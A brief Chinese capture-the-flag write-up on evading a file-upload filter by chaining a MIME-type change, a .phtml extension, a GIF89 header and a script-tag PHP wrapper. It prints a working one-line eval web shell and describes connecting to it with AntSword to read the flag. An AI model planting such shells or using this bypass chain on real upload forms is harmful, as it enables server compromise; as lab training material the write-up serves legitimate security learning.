直接上传
test.PHP
提示
Not image
不是图片,可能是MIME绕过,尝试抓包修改Content-Type
提示
Not PHP
,猜测可能是检测后缀名不能是PHP
,将test.PHP
改名为test.phtml
进行上传根据上传提示,不能有
<?
应该是检查了我们的文件内容可是使用
script
脚本的木马,只需要将language
修改为PHP
即可
<script language="PHP">@eval($_POST['cmd']);</script>
这次直接提示我们不是一个图片,检查了我们的文件内容
在文件头中加入
GIF89
,尝试绕过图片检测@H_502_67@
可以看到文件上传成功,那么文件上传到了哪里呢?一般默认就是
upload
目录,有些可以在源代码中看到上传地址访问上传的木马
查看源代码可以看到,木马已经被当做PHP执行,直接使用
蚁剑
连接木马测试连接成功,右键查看flag
使用知识点:
MIME绕过
phtml、PHP3等后缀解析为PHP
javascript脚本language属性设置解析PHP
GIF89绕过检测文件是否为图片函数
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。